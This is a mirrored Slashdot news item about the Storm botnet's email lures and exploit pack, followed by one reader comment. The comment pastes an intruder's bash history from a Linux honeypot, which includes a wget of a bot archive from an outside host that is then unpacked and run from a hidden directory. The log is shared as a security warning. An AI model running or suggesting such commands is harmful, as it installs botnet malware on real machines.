Slashdot Mirror

← Back to Stories (view on slashdot.org)

Storm Botnet Is Behind Two New Attacks

Posted by kdawson on from the do-not-click-here dept.

We've gotten a number of submissions about the new tricks the massive Storm botnet has been up to. Estimates of the size of this botnet range from 250K-1M to 5M-10M compromised machines. Reader cottagetrees notes a writeup at Exploit Prevention Labs on a new social engineering attack involving YouTube. The emails, which may be targeted at people who use private domain registrations, warn the recipient that their "face is all over 'net" on a YouTube video. The link is to a Storm-infected bot that attacks using the Q4Rollup exploit (a package of about a dozen encrypted exploits). And reader thefickler writes that the recent wave of "confirmation spam" is also due to Storm, as was the earlier, months-long "e-card from a friend" series of attack emails.

1 of 226 comments (clear)

  1. It's not just windows they're exploiting... by nick13245 · · Score: 5, Interesting

    For instance, here's a recent attack to my honeypot (Running Slackware Linux)

    root@zomg:~# cat /home/webmaster/. ./ .bash_history .ssh/ ../ .screenrc .xsession
    root@zomg:~# cat /home/webmaster/.bash_history
    ssh localhost
    w
    cat /etc/hosts
    cat /proc/cpuinfo
    passwd
    cd /var/tmp
    ks
    l
    sl
    ls
    ls- all
    ls -all
    mkdir " "
    cd " "
    clear
    wget imaginez0r.xhost.ro/botme.tar.gz
    tar zxvf botme.tar.gz
    rm -rf botme.tar.gz
    cd .bot/
    PATH=.:$PATH
    bash

    These kind of attacks happen every day, sometimes more than once a day. If you don't patch and secure your machine, or do stupid things like download and run binaries, it's gonna get owned. Doesn't matter what OS you run.